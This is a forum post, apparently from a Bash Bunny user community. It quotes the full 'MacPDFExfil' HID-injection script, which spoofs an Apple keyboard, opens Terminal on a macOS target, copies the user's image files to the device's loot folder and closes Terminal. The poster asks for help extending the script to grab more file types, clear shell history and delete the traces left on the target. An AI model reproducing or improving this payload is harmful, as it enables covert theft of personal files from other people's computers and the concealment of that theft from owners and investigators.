MacPDFExfil modifications


Hello,

I was playing around with the MacPDFExfil payload on my Bash Bunny and as expected it worked fine. I however tried to modify it a bit and ran into some trouble.

I wanted the BashBunny to look for .jpg, .jpeg and .png files all at the same time and put them into the loot folder. Changing it to only one of them is no problem but I couldn't figure out a way to look for all 3 file types at the same time. Moreover, I wanted the code to have a history -c and then the killall Terminal to leave as little trace of what I did as possible. Obviously that didn't work either. Replacing the killall Terminal with history -c works fine but having history -c and then killall Terminal didn't work. I played around with it and either I got an error or the last part (killall Terminal) just didn't show up at all. Last but not least, I would also like to remove the /loot folder that is created on the target machine itself.

If someone could help me with that I'd appreciate it a lot.

Thanks 

Quote

#!/bin/bash
#
# Title:         MacPDFExfil
# Author:        k1ul3ss
# Props:         audibleblink
# Version:       1.0
# Category:      Exfiltration
# Target:        macOS
# Attackmodes:   HID, Storage

ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E

# device name
dev_name="BashBunny"

# loot directory
lootdir="/Volumes/$dev_name/loot/Images/"

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 2000
QUACK STRING mkdir -p $lootdir
QUACK ENTER
QUACK STRING find \~ -name \'*.png\' -exec cp \"{}\" $lootdir \\\;\; killall Terminal
QUACK ENTER

# sync the filesystem
sync

 
